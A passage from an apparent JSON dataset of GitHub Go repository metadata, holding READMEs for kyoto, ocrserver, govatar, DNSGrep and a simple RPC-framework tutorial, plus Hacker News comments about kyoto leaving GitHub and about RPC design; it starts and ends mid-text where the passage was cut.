\u5982\u679c\u60f3\u7ed9\u81ea\u52a8\u8d4b\u503c\u7684\u65f6\u95f4\u5b57\u6bb5\u7528\u5176\u5b83\u5b57\u6bb5\u540d\uff0c\u4e0d\u60f3\u7528\"Created\"\uff0c\"Updated\"\uff0c\u53ef\u4ee5\u5728tag\u91cc\u6dfb\u52a0`qbs:\"created\"`\uff0c`qbs:\"updated\"`\u3002\r\n\r\n\r\n type Post struct {\r\n Id int64\r\n AuthorId int64\r\n Author *User\r\n Content string\r\n Created time.Time\r\n Updated time.Time\r\n }\r\n\r\n\r\n### \u67e5\u8be2\u65f6\u5ffd\u7565\u67d0\u4e9b\u5b57\u6bb5\uff1a\r\n- \u6709\u65f6\u5019\uff0c\u6211\u4eec\u67e5\u8be2\u65f6\u5e76\u4e0d\u9700\u8981\u67d0\u4e9b\u5b57\u6bb5\uff0c\u7279\u522b\u662f\u5173\u8054\u67e5\u8be2\u7684\u5b57\u6bb5\uff08\u6bd4\u5982`Author`\u5b57\u6bb5\uff09\uff0c\u6216\u6570\u636e\u5f88\u5927\u7684\u5b57\u6bb5\uff08\u6bd4\u5982`Content`\u5b57\u6bb5\uff09\r\n\uff0c\u5982\u679c\u5ffd\u7565\u6389\uff0c\u4f1a\u63d0\u9ad8\u67e5\u8be2\u6548\u7387\u3002\r\n\r\n\r\n func FindPostsOmitContentAndCreated(q *qbs.Qbs) ([]*Post, error) {\r\n \tvar posts []*Post\r\n \terr := q.OmitFields(\"Content\",\"Created\").Find(&posts)\r\n \treturn posts, err\r\n }\r\n\r\n\r\n### \u67e5\u8be2\u65f6\u5ffd\u7565\u5173\u8054\u5b57\u6bb5\uff1a\r\n- \u5982\u679cstruct\u91cc\u5b9a\u4e49\u4e86\u5173\u8054\u67e5\u8be2\uff0c\u6bcf\u6b21Find\u90fd\u4f1a\u81ea\u52a8JOIN\uff0c\u4e0d\u9700\u8981\u7279\u522b\u6307\u5b9a\uff0c\u4f46\u6709\u65f6\u5019\uff0c\u6211\u4eec\u5728\u67d0\u4e00\u6b21\u67e5\u8be2\u65f6\u5e76\u4e0d\u9700\u8981\u5173\u8054\u67e5\u8be2\uff0c\r\n\u8fd9\u65f6\u5ffd\u7565\u6389\u5173\u8054\u67e5\u8be2\u4f1a\u63d0\u9ad8\u67e5\u8be2\u6548\u7387\u3002\u5f53\u7136\u6211\u4eec\u53ef\u4ee5\u7528`OmitFields`\u5b9e\u73b0\u540c\u6837\u7684\u6548\u679c\uff0c\u4f46\u662f\u90a3\u6837\u9700\u8981\u5728\u53c2\u6570\u91cc\u624b\u5199\u5b57\u6bb5\u540d\uff0c\u4e0d\u591f\u7b80\u6d01\u3002\r\n- \u4f7f\u7528`OmitJoin`\u53ef\u4ee5\u5ffd\u7565\u6240\u6709\u5173\u8054\u67e5\u8be2\uff0c\u53ea\u8fd4\u56de\u5355\u4e00\u8868\u7684\u6570\u636e\uff0c\u548c`OmitFields`\u53ef\u4ee5\u540c\u65f6\u4f7f\u7528\u3002\r\n\r\n\r\n func FindPostsOmitJoin(q *qbs.Qbs) ([]*Post, error) {\r\n \tvar posts []*Post\r\n \terr := q.OmitJoin().OmitFields(\"Content\").Find(&posts)\r\n \treturn posts, err\r\n }\r\n\r\n\u3002\u3002\u3002\u672a\u5b8c\u4ee3\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kyoto-framework/kyoto", "link": "https://github.com/kyoto-framework/kyoto", "tags": ["frontend", "components", "framework", "go", "ui", "ui-components", "view", "golang"], "stars": 549, "description": "Golang SSR-first Frontend Library", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n

kyoto

\n\n

\n Go library for creating fast, SSR-first frontend avoiding vanilla templating downsides.\n

\n\n

\n \n \n \n \n \n \n \n \n \n \n \n

\n\n

\n Documentation •\n Quick start •\n Who uses? •\n Support us\n

\n\n## Motivation\n\nCreating asynchronous and dynamic layout parts is a complex problem for larger projects using `html/template`.\nLibrary tries to simplify this process.\n\n## What kyoto proposes?\n\n- Organize code into configurable and standalone components structure\n- Get rid of spaghetti inside of handlers\n- Simple asynchronous lifecycle\n- Built-in dynamics like Hotwire or Laravel Livewire\n- Using a familiar built-in `html/template`\n- Full control over project setup (minimal dependencies)\n- 0kb JS payload without actions client (~12kb when including a client)\n- Minimalistic utility-first package to simplify work with Go\n- Internationalizing helper\n- Cache control helper package (with a CDN page caching setup guide)\n\n## Reasons to opt out\n\n- API may change drastically between major versions\n- You want to develop SPA/PWA\n- You're just feeling OK with JS frameworks\n- Not situable for a frontend with a lot of client-side logic\n\n## Quick start\n\nIf you want to start straight from the example, use a starter project. \n\n```bash\n$ git clone https://github.com/kyoto-framework/start \n```\n\nIf you want to start from scratch, we have a minimal working [example](https://pkg.go.dev/github.com/kyoto-framework/kyoto/v2#hdr-Quick_start) to start with.\n\n\n## Team\n\n- Yurii Zinets: [email](mailto:yurii.zinets@icloud.com), [telegram](https://t.me/yuriizinets)\n- Viktor Korniichuk: [email](mailto:rowdyhcs@gmail.com), [telegram](https://t.me/dinoarmless)\n\n## Who uses?\n\n### Broker One\n\n**Website**: [https://mybrokerone.com](https://mybrokerone.com)\n\nThe first version of the site was developed with Vue and suffered from large payload and low performance.\nAfter discussion, it was decided to migrate to Go with a built-in `html/template` due to existing libraries infrastructure inside of the project. \nDespite the good performance result, the code was badly structured and it was very uncomfortable to work in existing paradigm. \nOn the basis of these problems, kyoto was born. Now, this library lies in the core of the platform.\n\n### Using the library in your project?\n\nPlease tell us about your story! We would love to talk about your usage experience.\n\n## Support us\n\nAny project support is appreciated! Providing a feedback, pull requests, new ideas, whatever. Also, donations and sponsoring will help us to keep high updates frequency. Just send us a quick email or a message on contacts provided above.\n\nIf you have an option to donate us with a crypto, we have some addresses.\n\nBitcoin: `bc1qgxe4u799f8pdyzk65sqpq28xj0yc6g05ckhvkk` \nEthereum: `0xEB2f24e830223bE081264e0c81fb5FD4DDD2B7B0`\n\nAlso, we have a page on open collective for backers support.\n\nOpen Collective: [https://opencollective.com/kyoto-framework](https://opencollective.com/kyoto-framework)", "readme_type": "markdown", "hn_comments": "last night I checked my billing page on sr.ht and there was a line chart that had \"11.2%\" to indicate that currently 11.2% of users are paying...there was also a redline at 13% which I assume is some sustainability thresholdif you want viable alternatives to github, pay up!sr.ht is a nice service that allows some premium features like ssh'ing into ci instances to check failures...there is plenty worth paying for> As far as a go packaging system makes host changing painful enough, there is no chance to keep old versions on the new host.> If you're using version 0.x, please, make a fork, or create a local project copy.I feel like an official mirror on GitHub would be cleaner, as the old URLs could still work, but I suppose that doesn't match the vision.Recently I contributed to a new project which needed repository hosting, and I was excited to suggest Sourcehut. But when we learned of the email-only collaboration, it was too uncomfortable for this particular group (and I include myself). Most devs are used to pull requests, it seems awkward that Sourcehut doesn't support them.Questions for whoever was involved with this decision or might know:Why was Sourcehut chosen? Any specific appealing features?Any alternatives considered?I wish Sourcehut displayed code on the repo's primary page (as opposed to a separate \"tree\" tab) like most mainstream services such as GitHub or GitLab.Isn't this moving from proprietary repo provider to proprietary repo provider (albeit a smaller one)?In another of the get-off-GitHub discussions recently, I mentioned to another FOSS project leader that they should consider taking their projects off GitHub to a forge that respects FOSS licenses. Sourcehut was one of the suggestions in addition to GitLab.I'm glad to see that some projects are leading the way in this direction. To me, this move shows that the devs are competent and not afraid of migrations away from legacy forges if necessary; similar to how people moved from Sourceforge to GitHub 10 years ago.I'll keep Kyoto framework in mind if need an SSR frontend framework in the future! I suggest others do the same.----------------------------------------[1] https://news.ycombinator.com/item?id=31941568Just had this thought: are there any decentralized code hosting services?To me, I don't really see a difference between GitHub and sr.ht. Companies can start out with these \"friendly\" attitudes towards FOSS, but when they reel in many paying customers, they can pretty easily, and without consequence, change their policies to be more aggressive (geared towards profit) and greedy. It just seems inevitable to me.However, decentralized hosting and governance might make it so that there can't be a hostile takeover and incorrect (relative to license) usage of FOSS code. I'm thinking something akin to IPFS but more specialized towards e.g git repository hosting.Not sure how such hosting would be feasible in terms of breaking even between hosting costs, but a decentralized service hosting distributed VCS databases seems more along the lines of the philosophy of DVCS's in general. DVCS's in general do not have timeliness requirements (i.e your \"git push\" most of the time doesn't have to propagate worldwide immediately) and the other goodies that come with being on GitHub (e.g CI/CD) seem orthogonal to the actual code hosting itself, and I don't see why that can't be built separately without being part of the service.Recent and related:Give up GitHub: The time has come - https://news.ycombinator.com/item?id=31932250 - June 2022 (544 comments)Any good reason(s) why SourceHut and not Gitlab?SourceHut is missing a lot of features from GitHub, I'm not even sure if SourceHut has a file tree. It's interface is also much different than GitHub's.Meanwhile GitLab is almost an exact clone of GitHub. It has discussion boards, pull requests (\"merge requests\"), even CI which replaces GitHub actions.I figure SourceHut is more FOSS-friendly than GitLab. But GitLab still supports self-hosting, and AFAIK is open-source and FOSS-freindly itself. The KDE and GNOME project even have their own hosted GitLab versions. All-in-all I just think migrating from GitHub to GitLab seems much easier than migrating to SourceHut.I approve the move, congrats!this makes me want gitlab to focus more on the software development side instead ci cd devopsIt would be useful to know what this project is. Lots of projects are on other code hosting services. Is this is a particularly important project? Go has been my daily driver for almost a decade and this is the first I've heard of it.If there's a big migration away from Github then I really worry what I'll do about discovering interesting stuff. I spend an hour or so a week looking through my Github feed. Something genuinely valuable will be lost once that is no longer a rich seam of new repos.git-remote-gcrypt + rclone + s3.These things are like \"Why I left Google\" from 2010s.I left Codeplex many years ago. I could easily leave Github as well, in fact I'll do that over the weekend.This article was pretty eye-opening. https://sfconservancy.org/GiveUpGitHub/The title confused me at first, \"they are moving from sr.ht to GitHub?\", but then I realized I'm just used to reading migrations like that in a \"from $serviceB to $serviceA\" manner and \"to $serviceA from $serviceB\" made it all wrong in my brain. Funny how that works.Yikes. Mailing list development might work for Linus and the kernel team but the PR approach on GitHub is so much easier for developers to discover and use and even for senior or more seasoned devs I\u2019d rather do this in the open on a PR than in some mailing list. Ugh.Copilot shouldn't be paid service of it's based on someone else workFWIW, just as Amazon and SalesForce are already doing their version of CoPilot, there is nothing to prevent GitHub from training its models off open source that is hosted on sr.ht or GitLab or anywhere else. If it is open source then the source is going to be available to be used for the models.For what it's worth, none of the reasons listed for switching away from Github in that SFC article are persuasive to me, but that's my choice. Kyoto project is free to choose what's best for them.Does Kyoto license explicitly forbid the code from being cloned to GitHub? If not, seems like at best buying time until someone else does.As a rule of thumb, it is a good idea to support smaller and indie companies than mega corporations, IMHO - even if those mega corporations aren't doing anything that is ethically dubious. That is doubtful, as it is likely not possible to become that big without trampling on some toes or bending some rules.Why support Github when there is st.ht? Why support Starbucks when you can support a mom & pop coffee shop? Why buy books from Amazon when you can buy from a Indie book store? Granted, not everyone has the patience, time and money to vote with wallet, but we can try wherever possible. I hope more people ditch GithubSomething I've been unclear on for a while, and I'd be grateful if anyone can explain it.The project points to [0] as its rationale for leaving Github. One of that document's complaints about Github is that they do business with the US's ICE department. It's not the only group from which I've heard such thorough contempt for ICE.I understand why people might have problems with some aspects of ICE's activities, e.g. charges of inhumane treatment of people crossing the border without authorization. So it makes sense to me that they'd protest those particular behaviors.But protesting all of ICE makes no more sense to me than un-nuanced calls to entirely defund the police, or abolish the entire DoD. I.e., it seems obvious that totally eliminating any of those government functions would cause problems that almost nobody would find acceptable.Is there something I'm missing?[0] https://sfconservancy.org/GiveUpGitHub/Dupe: https://news.ycombinator.com/item?id=31961402", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "otiai10/ocrserver", "link": "https://github.com/otiai10/ocrserver", "tags": ["go", "ocr", "ocr-server", "docker", "heroku", "api", "api-server", "curl"], "stars": 548, "description": "A simple OCR API server, seriously easy to be deployed by Docker, on Heroku as well", "lang": "Go", "repo_lang": "", "readme": "# ocrserver\n\n[![Go CI](https://github.com/otiai10/ocrserver/workflows/Go%20CI/badge.svg)](https://github.com/otiai10/ocrserver/actions?query=workflow%3A%22Go+CI%22)\n[![codecov](https://codecov.io/gh/otiai10/ocrserver/branch/main/graph/badge.svg)](https://codecov.io/gh/otiai10/ocrserver)\n[![Go Report Card](https://goreportcard.com/badge/github.com/otiai10/ocrserver)](https://goreportcard.com/report/github.com/otiai10/ocrserver)\n\nSimple OCR server, as a small working sample for [gosseract](https://github.com/otiai10/gosseract).\n\nTry now here https://ocr-example.herokuapp.com/, and deploy your own now.\n\n[![](https://user-images.githubusercontent.com/931554/36279290-7134626a-124b-11e8-8e47-d93b7122ea0d.png)](https://ocr-example.herokuapp.com)\n\n# Deploy to Heroku\n\n```sh\n# Get the code\n% git clone git@github.com:otiai10/ocrserver.git\n% cd ocrserver\n# Make your app\n% heroku login\n% heroku create\n# Deploy the container\n% heroku container:login\n% heroku container:push web\n# Enjoy it!\n% heroku open\n```\n\ncf. [heroku cli](https://devcenter.heroku.com/articles/heroku-cli#download-and-install)\n\n\n# Quick Start\n\n## Ready-Made Docker Image\n\n```sh\n% docker run -p 8080:8080 otiai10/ocrserver\n# open http://localhost:8080\n```\n\ncf. [docker](https://www.docker.com/products/docker-toolbox)\n\n## Development with Docker Image\n\n```sh\n% docker-compose up\n# open http://localhost:8080\n```\n\nYou need more languages?\n\n```sh\n% docker-compose build --build-arg LOAD_LANG=rus\n% docker-compose up\n```\n\ncf. [docker-compose](https://www.docker.com/products/docker-toolbox)\n\n## Manual Setup\n\nIf you have tesseract-ocr and library files on your machine\n\n```sh\n% go get github.com/otiai10/ocrserver/...\n% PORT=8080 ocrserver\n# open http://localhost:8080\n```\n\ncf. [gosseract](https://github.com/otiai10/gosseract)\n\n# Documents\n\n- [API Endpoints](https://github.com/otiai10/ocrserver/wiki/API-Endpoints)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "o1egl/govatar", "link": "https://github.com/o1egl/govatar", "tags": ["skin", "avatar-generator", "go", "golang"], "stars": 548, "description": "Avatar generation library for GO language", "lang": "Go", "repo_lang": "", "readme": "# GOvatar\n[![License](http://img.shields.io/:license-mit-blue.svg)](LICENSE)\n[![GoDoc](https://godoc.org/github.com/o1egl/govatar?status.svg)](https://godoc.org/github.com/o1egl/govatar)\n[![Build](https://github.com/o1egl/govatar/actions/workflows/main.yaml/badge.svg)](https://github.com/o1egl/govatar/actions/workflows/main.yaml)\n[![Coverage](https://codecov.io/gh/o1egl/govatar/branch/master/graph/badge.svg)](https://codecov.io/gh/o1egl/govatar)\n[![Go Report Card](https://goreportcard.com/badge/github.com/o1egl/govatar)](https://goreportcard.com/report/github.com/o1egl/govatar)\n\n![GOvatar image](files/avatars.jpg)\n\nGOvatar is an avatar generation library written in GO\n\n---\n\n#### Notes\n1. From release v0.4.0 onward, the minimal supported golang version is 1.16.\n\n---\n\n## Install\n\n### Brew\n\n```\n$ brew tap o1egl/tap\n$ brew install govatar\n```\n\n### Docker\n\n```\n$ docker pull o1egl/govatar\n```\n\n### From source\n\n```\n$ go get -u github.com/o1egl/govatar/...\n```\n\nPrebuilt [binary packages](https://github.com/o1egl/govatar/releases) are available for Mac, Linux, and Windows.\n\n## Usage\n\n```bash\n$ govatar generate male -o avatar.png # Generates random avatar.png for male\n$ govatar generate female -o avatar.png # Generates random avatar.png for female\n$ govatar generate male -u username@site.com -o avatar.png # Generates avatar.png for specified username\n$ govatar -h # Display help message\n```\n\n#### As lib\n\nGenerates avatar and save it to filePath\n\n```go\nerr := govatar.GenerateFile(govatar.MALE, \"/path/to/avatar.jpg\")\nerr := govatar.GenerateFileForUsername(govatar.MALE, \"username\", \"/path/to/avatar.jpg\")\n````\n\nGenerates an avatar and returns it as an image.Image\n\n```go\nimg, err := govatar.Generate(govatar.MALE)\nimg, err := govatar.GenerateForUsername(govatar.MALE, \"username\")\n````\n\n\n## Copyright, License & Contributors\n\n### Adding new skins\n\n1. Add new skins to the background, male/clothes, female/hair, etc...\n2. Submit pull request :)\n\n### Submitting a Pull Request\n\n1. Fork it.\n2. Create a branch (`git checkout -b my_branch`)\n3. Commit your changes (`git commit -am \"Added new awesome avatars\"`)\n4. Push to the branch (`git push origin my_branch`)\n5. Open a [Pull Request](https://github.com/o1egl/govatar/pulls)\n6. Enjoy a refreshing Diet Coke and wait\n\nGOvatar is released under the MIT license. See [LICENSE](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "erbbysam/DNSGrep", "link": "https://github.com/erbbysam/DNSGrep", "tags": [], "stars": 548, "description": "Quickly Search Large DNS Datasets", "lang": "Go", "repo_lang": "", "readme": "# DNSGrep\nA utility for quickly searching presorted DNS names. Built around the Rapid7 rdns & fdns dataset.\n\n# How does it work?\n\nThis utility assumes the file provided is presorted (both alphabetical, and symbols).\n\nThe algorithm is pretty simple:\n1) Use a binary search algorithm to seek through the file, looking for a substring match against the query.\n2) Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.\n3) Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.\n\n# Limits\n\nThere is a built-in limit system. This prevents 2 things:\n1) scanning too far backwards (`MaxScan`)\n2) scanning too far forwards after scanning backwards (`MaxOutputLines`)\n\nThis allows for any input while stopping requests that are taking too long.\n\nAdditionally, this utility does not handle the edge cases(start/end) of files and will return an error if encountered.\n\n# Install\n\n`go get` the following packages:\n\n```\n# used for dnsgrep cli flags\ngo get \"github.com/jessevdk/go-flags\"\n# used by the experimental server for http routing\ngo get \"github.com/gorilla/mux\"\n# pull in a string reversal function\ngo get \"github.com/golang/example/stringutil\"\n\n```\n\n# Run\n\nThe following steps were tested with Ubuntu 16.04 & go 1.11.5.\n\nGenerate fdns_a.sort.txt and rdns.sort.txt first using the scripts found in the scripts/ folder:\n```\n# Each of these scripts requires:\n# * 3 hours+ on an SSD\n# * 300GB+ temp disk space (under the same folder)\n# * ~65GB for output output (under the same folder)\n# * jq to be installed\n./scripts/fdns_a.sh\n./scripts/rdns.sh\n```\n\n\nRun the command line utility:\n```\ngo run dnsgrep.go -f DNSBinarySearch/test_data.txt -i \"amiccom.com.tw\"\n```\n\nRun the experimental server in the same folder as fdns_a.sort & rdns.sort.txt:\n```\ngo run experimentalServer.go\n```\n\n# Docker \n\nYou can also run the command line utility using Docker:\n```\ndocker build -t dnsgrep .\ndocker run --rm -it -v \"$PWD\"/DNSBinarySearch:/files dnsgrep -f /files/test_data.txt -i \".amiccom.com.tw\"\n```\n\n# Data Source\nThe source of this data referenced throughout this repository is Rapid7 Labs. Please review the Terms of Service:\nhttps://opendata.rapid7.com/about/\n\nhttps://opendata.rapid7.com/sonar.rdns_v2/\n\nhttps://opendata.rapid7.com/sonar.fdns_v2/\n\n# Stack Overflow References\n\nvia https://unix.stackexchange.com/a/35472\n* we need to sort with LC_COLLATE=C to also sort ., chars\n\nvia https://unix.stackexchange.com/a/350068\n * To sort a large file: split it into chunks, sort the chunks and then simply merge the results\n\n\n\n# License\n\nSee LICENSE file.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ankur-anand/simple-go-rpc", "link": "https://github.com/ankur-anand/simple-go-rpc", "tags": ["go", "golang", "rpc-framework", "rpc"], "stars": 548, "description": "RPC explained by writing simple RPC framework in 300 lines of pure Golang.", "lang": "Go", "repo_lang": "", "readme": "## Simple GoRPC\n\nLearning RPC basic building blocks by building a simple RPC framework in Golang from scratch.\n\n## RPC\n\nIn Simple Term **Service A** wants to call **Service B** functions. But those two services are not in the same memory space. So it cannot be called directly.\n\nSo, in order to make this call happen, we need to express the semantics of how to call and also how to pass the communication through the network.\n\n### Let's think what we do when we call function in the same memory space (local call)\n\n```go\ntype User struct {\n\tName string\n\tAge int\n}\n\nvar userDB = map[int]User{\n\t1: User{\"Ankur\", 85},\n\t9: User{\"Anand\", 25},\n\t8: User{\"Ankur Anand\", 27},\n}\n\n\nfunc QueryUser(id int) (User, error) {\n\tif u, ok := userDB[id]; ok {\n\t\treturn u, nil\n\t}\n\n\treturn User{}, fmt.Errorf(\"id %d not in user db\", id)\n}\n\n\nfunc main() {\n\tu , err := QueryUser(8)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfmt.Printf(\"name: %s, age: %d \\n\", u.Name, u.Age)\n}\n```\n\nNow, how do we do the same function call over the network?\n\n**Client** will call _QueryUser(id int)_ function over the network and there will be one server which will Serve the Call to this function and return the Response _User{\"Name\", id}, nil_.\n\n## Network Transmission Data format.\n\nSimple-gorpc will do TLV (fixed-length header + variable-length message body) encoding scheme to regulate the transmission of data, over the tcp.\n**More on this later**\n\n### Before we send our data over the network we need to define the structure how we are going to send the data over the network.\n\nThis helps us to define a common protocol that, the client and server both can understand. (protobuf IDL define what both server and client understand).\n\n### So data received by the server needs to have:\n\n- the name of the function to be called\n- list of parameters to be passed to that function\n\nAlso let's agree that the second return value is of type error, indicating the RPC call result.\n\n```go\n// RPCdata transmission format\ntype RPCdata struct {\n\tName string // name of the function\n\tArgs []interface{} // request's or response's body expect error.\n\tErr string // Error any executing remote server\n}\n```\n\nSo now that we have a format, we need to serialize this so that we can send it over the network.\nIn our case we will use the `go` default binary serialization protocol for encoding and decoding.\n\n```go\n// be sent over the network.\nfunc Encode(data RPCdata) ([]byte, error) {\n\tvar buf bytes.Buffer\n\tencoder := gob.NewEncoder(&buf)\n\tif err := encoder.Encode(data); err != nil {\n\t\treturn nil, err\n\t}\n\treturn buf.Bytes(), nil\n}\n\n// Decode the binary data into the Go struct\nfunc Decode(b []byte) (RPCdata, error) {\n\tbuf := bytes.NewBuffer(b)\n\tdecoder := gob.NewDecoder(buf)\n\tvar data RPCdata\n\tif err := decoder.Decode(&data); err != nil {\n\t\treturn Data{}, err\n\t}\n\treturn data, nil\n}\n```\n\n### Network Transmission\n\nThe reason for choosing the TLV protocol is due to the fact that it's very simple to implement, and it also fullfills our need over identification of the length of data to read, as we need to identify the number of bytes to read for this request over the stream of incoming request. `Send and Receive does the same`\n\n```go\n// Transport will use TLV protocol\ntype Transport struct {\n\tconn net.Conn // Conn is a generic stream-oriented network connection.\n}\n\n// NewTransport creates a Transport\nfunc NewTransport(conn net.Conn) *Transport {\n\treturn &Transport{conn}\n}\n\n// Send TLV data over the network\nfunc (t *Transport) Send(data []byte) error {\n\t// we will need 4 more byte then the len of data\n\t// as TLV header is 4bytes and in this header\n\t// we will encode how much byte of data\n\t// we are sending for this request.\n\tbuf := make([]byte, 4+len(data))\n\tbinary.BigEndian.PutUint32(buf[:4], uint32(len(data)))\n\tcopy(buf[4:], data)\n\t_, err := t.conn.Write(buf)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}\n\n// Read TLV sent over the wire\nfunc (t *Transport) Read() ([]byte, error) {\n\theader := make([]byte, 4)\n\t_, err := io.ReadFull(t.conn, header)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdataLen := binary.BigEndian.Uint32(header)\n\tdata := make([]byte, dataLen)\n\t_, err = io.ReadFull(t.conn, data)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn data, nil\n}\n```\n\nNow that we have the DataFormat and Transport protocol defined. We need and **RPC Server** and **RPC CLient**\n\n## RPC SERVER\n\nRPC Server will receive the `RPCData` which will have an function Name.\n**So we need to maintain and map that contains an function name to actual function mapping**\n\n```go\n// RPCServer ...\ntype RPCServer struct {\n\taddr string\n\tfuncs map[string] reflect.Value\n}\n\n// Register the name of the function and its entries\nfunc (s *RPCServer) Register(fnName string, fFunc interface{}) {\n\tif _,ok := s.funcs[fnName]; ok {\n\t\treturn\n\t}\n\n\ts.funcs[fnName] = reflect.ValueOf(fFunc)\n}\n```\n\nNow that we have the func registered, when we receive the request we will check if the name of func passed during the execution of the function is present or not. and then will execute it accordingly\n\n```go\n// Execute the given function if present\nfunc (s *RPCServer) Execute(req RPCdata) RPCdata {\n\t// get method by name\n\tf, ok := s.funcs[req.Name]\n\tif !ok {\n\t\t// since method is not present\n\t\te := fmt.Sprintf(\"func %s not Registered\", req.Name)\n\t\tlog.Println(e)\n\t\treturn RPCdata{Name: req.Name, Args: nil, Err: e}\n\t}\n\n\tlog.Printf(\"func %s is called\\n\", req.Name)\n\t// unpackage request arguments\n\tinArgs := make([]reflect.Value, len(req.Args))\n\tfor i := range req.Args {\n\t\tinArgs[i] = reflect.ValueOf(req.Args[i])\n\t}\n\n\t// invoke requested method\n\tout := f.Call(inArgs)\n\t// now since we have followed the function signature style where last argument will be an error\n\t// so we will pack the response arguments expect error.\n\tresArgs := make([]interface{}, len(out) - 1)\n\tfor i := 0; i < len(out) - 1; i ++ {\n\t\t// Interface returns the constant value stored in v as an interface{}.\n\t\tresArgs[i] = out[i].Interface()\n\t}\n\n\t// pack error argument\n\tvar er string\n\tif e, ok := out[len(out) - 1].Interface().(error); ok {\n\t\t// convert the error into error string value\n\t\ter = e.Error()\n\t}\n\treturn RPCdata{Name: req.Name, Args: resArgs, Err: er}\n}\n```\n\n## RPC CLIENT\n\nSince the concrete implementation of the function is on the server side, the client only has the prototype of the function, so we need complete prototype of the calling function, so that we can call it.\n\n```go\nfunc (c *Client) callRPC(rpcName string, fPtr interface{}) {\n\tcontainer := reflect.ValueOf(fPtr).Elem()\n\tf := func(req []reflect.Value) []reflect.Value {\n\t\tcReqTransport := NewTransport(c.conn)\n\t\terrorHandler := func(err error) []reflect.Value {\n\t\t\toutArgs := make([]reflect.Value, container.Type().NumOut())\n\t\t\tfor i := 0; i < len(outArgs)-1; i++ {\n\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t}\n\t\t\toutArgs[len(outArgs)-1] = reflect.ValueOf(&err).Elem()\n\t\t\treturn outArgs\n\t\t}\n\n\t\t// Process input parameters\n\t\tinArgs := make([]interface{}, 0, len(req))\n\t\tfor _, arg := range req {\n\t\t\tinArgs = append(inArgs, arg.Interface())\n\t\t}\n\n\t\t// ReqRPC\n\t\treqRPC := RPCdata{Name: rpcName, Args: inArgs}\n\t\tb, err := Encode(reqRPC)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\terr = cReqTransport.Send(b)\n\t\tif err != nil {\n\t\t\treturn errorHandler(err)\n\t\t}\n\t\t// receive response from server\n\t\trsp, err := cReqTransport.Read()\n\t\tif err != nil { // local network error or decode error\n\t\t\treturn errorHandler(err)\n\t\t}\n\t\trspDecode, _ := Decode(rsp)\n\t\tif rspDecode.Err != \"\" { // remote server error\n\t\t\treturn errorHandler(errors.New(rspDecode.Err))\n\t\t}\n\n\t\tif len(rspDecode.Args) == 0 {\n\t\t\trspDecode.Args = make([]interface{}, container.Type().NumOut())\n\t\t}\n\t\t// unpackage response arguments\n\t\tnumOut := container.Type().NumOut()\n\t\toutArgs := make([]reflect.Value, numOut)\n\t\tfor i := 0; i < numOut; i++ {\n\t\t\tif i != numOut-1 { // unpackage arguments (except error)\n\t\t\t\tif rspDecode.Args[i] == nil { // if argument is nil (gob will ignore \"Zero\" in transmission), set \"Zero\" value\n\t\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t\t} else {\n\t\t\t\t\toutArgs[i] = reflect.ValueOf(rspDecode.Args[i])\n\t\t\t\t}\n\t\t\t} else { // unpackage error argument\n\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t}\n\t\t}\n\n\t\treturn outArgs\n\t}\n\tcontainer.Set(reflect.MakeFunc(container.Type(), f))\n}\n```\n\n### Testing our framework\n\n```go\npackage main\n\nimport (\n\t\"encoding/gob\"\n\t\"fmt\"\n\t\"net\"\n)\n\ntype User struct {\n\tName string\n\tAge int\n}\n\nvar userDB = map[int]User{\n\t1: User{\"Ankur\", 85},\n\t9: User{\"Anand\", 25},\n\t8: User{\"Ankur Anand\", 27},\n}\n\nfunc QueryUser(id int) (User, error) {\n\tif u, ok := userDB[id]; ok {\n\t\treturn u, nil\n\t}\n\n\treturn User{}, fmt.Errorf(\"id %d not in user db\", id)\n}\n\nfunc main() {\n\t// new Type needs to be registered\n\tgob.Register(User{})\n\taddr := \"localhost:3212\"\n\tsrv := NewServer(addr)\n\n\t// start server\n\tsrv.Register(\"QueryUser\", QueryUser)\n\tgo srv.Run()\n\n\t// wait for server to start.\n\ttime.Sleep(1 * time.Second)\n\n\t// start client\n\tconn, err := net.Dial(\"tcp\", addr)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tcli := NewClient(conn)\n\n\tvar Query func(int) (User, error)\n\tcli.callRPC(\"QueryUser\", &Query)\n\n\tu, err := Query(1)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(u)\n\n\tu2, err := Query(8)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(u2)\n}\n```\n\nOutput\n\n```\n2019/07/23 20:26:18 func QueryUser is called\n{Ankur 85}\n2019/07/23 20:26:18 func QueryUser is called\n{Ankur Anand 27}\n```\n\n`go run main.go`\n", "readme_type": "markdown", "hn_comments": "Worth it to learn gRPC first or start with std lib RPC?For a good RPC abstraction, I think a key requirement is to easily and safely change the deployment separation between modules that use the abstraction \u2013 deployment separations being: in-proc, inter-process-communication and remote-procedure-call.That is,1. deploy the modules within the same process then the method invocation is most efficient;2. deploy the module across separate OS processes on the same machine then the method invocation is via the best available OS IPC mechanism;3. deploy the module across separate machines then the method invocation is over network with most efficient remote procedure call implementation.A long time ago I worked on a project that used Corba (with ACE TAO) that had facilities like this and it made development, testing environments vs various production environment permutations a lot easier to build for and manage over multiple product lifecycles. Now-a-days, these Microservices frameworks are missing these (basic) features and it overly complicates the deployment scenarios.Rather than hand-rolling 300 line custom RPC mechanisms like this one, I would rather prefer a more complete one that did solve the above problems.I haven't 